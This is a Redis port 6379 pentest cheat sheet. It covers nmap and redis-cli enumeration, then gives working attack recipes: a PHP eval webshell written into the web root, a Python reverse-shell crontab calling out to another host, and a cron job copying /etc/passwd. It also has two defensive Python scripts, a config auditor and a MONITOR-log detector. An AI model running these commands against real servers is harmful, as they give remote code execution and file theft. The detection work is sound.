Redis – port 6379

Redis is an in-memory data structure store, used as a database, cache and message broker. It normally speaks a plain-text protocol (RESP) but can also be configured to use SSL/TLS.

💡 Hydra supports Redis.

Nmap scripts

ls -la /usr/share/nmap/scripts/redis*
IP=x.x.x.x
nmap --script redis-info -sV -p 6379 $IP

On the server

Instance version

redis-server --version

Redis Client

redis-cli
redis-cli -h <hostname>

If the client returns the following message, valid credentials are required to access the Redis instance.

-NOAUTH Authentication required.

Commands within the Redis client

Look under the “Keyspace” section of the info output to find the available databases.

info
client list
config get *

Assuming the database ID is 1 (see the Keyspace section of the “info” output):

SELECT 1
[ ... Indicate the database ... ]
KEYS * 
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]
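The INFO and CONFIG GET output described above is easy to check automatically. The following Python script is an added example, not code from the original cheat sheet: it parses the “# Keyspace” section of an INFO response into a database-to-key-count map and audits a CONFIG GET result for the settings that make an instance reachable without authentication (empty requirepass, protected-mode off, bind on all interfaces). Both inputs are constructed samples written in the format redis-server emits, not captures from a real host; the parsing of INFO and the flat name/value layout of CONFIG GET match what the server returns, the specific checks are my own choice.

```python
"""Parse Redis INFO / CONFIG GET output and flag weak access settings.

Added example, not part of the original cheat sheet. SAMPLE_INFO and
SAMPLE_CONFIG are constructed in the format redis-server emits.
"""
import re

# Constructed sample: INFO output with a "# Keyspace" section.
SAMPLE_INFO = """# Server
redis_version:6.2.6
redis_mode:standalone

# Keyspace
db0:keys=3,expires=0,avg_ttl=0
db1:keys=42,expires=5,avg_ttl=3600000
"""

# Constructed sample: CONFIG GET * returns a flat list of name, value pairs.
SAMPLE_CONFIG = [
    "requirepass", "",
    "protected-mode", "no",
    "bind", "0.0.0.0",
    "dir", "/var/lib/redis",
    "dbfilename", "dump.rdb",
]

# Hardened counterpart of the same settings (constructed).
HARDENED_CONFIG = [
    "requirepass", "example-strong-password",
    "protected-mode", "yes",
    "bind", "127.0.0.1",
    "dir", "/var/lib/redis",
    "dbfilename", "dump.rdb",
]


def parse_keyspace(info_text):
    """Return {db_index: number_of_keys} from the Keyspace section of INFO."""
    result = {}
    in_keyspace = False
    for line in info_text.splitlines():
        line = line.strip()
        if line.startswith("#"):
            # Section headers look like "# Keyspace"; track which one we are in.
            in_keyspace = (line == "# Keyspace")
            continue
        if in_keyspace and line:
            m = re.match(r"db(\d+):keys=(\d+)", line)
            if m:
                result[int(m.group(1))] = int(m.group(2))
    return result


def pairs_to_dict(flat):
    """CONFIG GET returns [name1, value1, name2, value2, ...]; turn it into a dict."""
    return dict(zip(flat[0::2], flat[1::2]))


def audit_config(flat):
    """Return a list of human-readable findings; empty list means nothing flagged."""
    cfg = pairs_to_dict(flat)
    findings = []
    if cfg.get("requirepass", "") == "":
        findings.append("no password set (requirepass is empty)")
    if cfg.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode is disabled")
    bind = cfg.get("bind", "")
    addrs = bind.split()
    # An empty bind, 0.0.0.0 or * all mean the server listens on every interface.
    if not addrs or "0.0.0.0" in addrs or "*" in addrs:
        findings.append(f"listening on all interfaces (bind={bind!r})")
    return findings


if __name__ == "__main__":
    print("keyspace:", parse_keyspace(SAMPLE_INFO))
    for name, cfg in (("weak", SAMPLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_config(cfg) or 'no findings'}")
```

To run it against a live instance you would feed it the text of `redis-cli info` and the list returned by `redis-cli config get '*'`; the three checks correspond to the NOAUTH behaviour and the network exposure discussed above.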

Webshell

You need the webroot path.

  • /usr/share/nginx/html
  • /var/www/html

redis-cli -h $IP
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

redis-cli -h $IP
config set dir /var/www/html
config set dbfilename sh.php
set payload '<?php eval($_GET[0]);?>'
bgsave

Reverse shell crontab

Not working for now

For Ubuntu and CentOS, the path is /var/spool/cron/

echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK

KALI=x.x.x.x
IP=y.y.y.y
echo -e "\n\n* * * * * cp /etc/passwd /var/www/html/passwd\n\n"|redis-cli -h $IP -x set 1
OK
redis-cli -h $IP config set dir /var/spool/cron/crontabs/
OK
redis-cli -h $IP config set dbfilename root
OK
redis-cli -h $IP save
OK
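Both the webshell and the crontab techniques above rely on the same observable sequence: a client issues CONFIG SET dir pointing at a web root or cron spool, CONFIG SET dbfilename with a name that is not an .rdb file, and then SAVE or BGSAVE. The following Python detector is an added example, not code from the original cheat sheet: it parses lines in the format printed by the Redis MONITOR command (`<unix time> [<db> <client addr>] "cmd" "args"...`), tracks the dir/dbfilename state per client, and raises an alert when a save is triggered while either value looks like a redirect. The MONITOR lines and client addresses are constructed samples, and the list of suspicious directories is my own assumption, seeded from the paths the cheat sheet mentions.

```python
"""Flag persistence-redirect sequences (config set dir/dbfilename + save) in Redis MONITOR output.

Added example, not part of the original cheat sheet. The log lines and client
addresses are constructed; SUSPICIOUS_DIRS is an assumption based on the paths
named in the cheat sheet.
"""
import re
from collections import defaultdict

# MONITOR prints: <timestamp> [<db> <client>] "cmd" "arg1" "arg2" ...
MONITOR_LINE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
QUOTED_ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample: one client redirects the dump into a web root and triggers
# BGSAVE; another sets a normal data directory and saves.
SAMPLE_MONITOR = """\
1700000000.100000 [0 192.0.2.10:51000] "config" "set" "dir" "/var/www/html"
1700000001.100000 [0 192.0.2.10:51000] "config" "set" "dbfilename" "sh.php"
1700000002.100000 [0 192.0.2.10:51000] "set" "payload" "..."
1700000003.100000 [0 192.0.2.10:51000] "bgsave"
1700000004.100000 [0 10.0.0.7:40000] "get" "session:abc"
1700000005.100000 [0 10.0.0.7:40000] "config" "set" "dir" "/var/lib/redis"
1700000006.100000 [0 10.0.0.7:40000] "save"
"""

# Assumption: directories where a written dump file becomes something other than data.
SUSPICIOUS_DIRS = ("/var/www", "/usr/share/nginx/html", "/var/spool/cron",
                   "/root/.ssh", "/home")


def parse_monitor_line(line):
    """Split one MONITOR line into its timestamp, db, client and argument list."""
    m = MONITOR_LINE.match(line)
    if not m:
        return None
    ts, db, client, rest = m.groups()
    return {"ts": float(ts), "db": int(db), "client": client,
            "args": QUOTED_ARG.findall(rest)}


def detect_persistence_redirect(monitor_text):
    """Return (timestamp, client, command, reason) for each suspicious SAVE/BGSAVE."""
    state = defaultdict(dict)   # per-client view of the last dir/dbfilename set
    alerts = []
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        cmd, args = ev["args"][0].lower(), ev["args"][1:]
        st = state[ev["client"]]
        if cmd == "config" and len(args) >= 3 and args[0].lower() == "set":
            name, value = args[1].lower(), args[2]
            if name in ("dir", "dbfilename"):
                st[name] = value
        elif cmd in ("save", "bgsave"):
            d = st.get("dir", "")
            f = st.get("dbfilename", "")
            reasons = []
            if any(d.startswith(p) for p in SUSPICIOUS_DIRS):
                reasons.append(f"dir={d}")
            if f and not f.endswith(".rdb"):
                reasons.append(f"dbfilename={f}")
            if reasons:
                alerts.append((ev["ts"], ev["client"], cmd, ", ".join(reasons)))
    return alerts


if __name__ == "__main__":
    for alert in detect_persistence_redirect(SAMPLE_MONITOR):
        print("ALERT", alert)
```

The state is keyed per client because the dir/dbfilename changes and the save usually come from the same connection; in a real deployment you would feed it `redis-cli monitor` output, and the same logic applies to a server-side policy of renaming or disabling the CONFIG command so the sequence cannot occur at all.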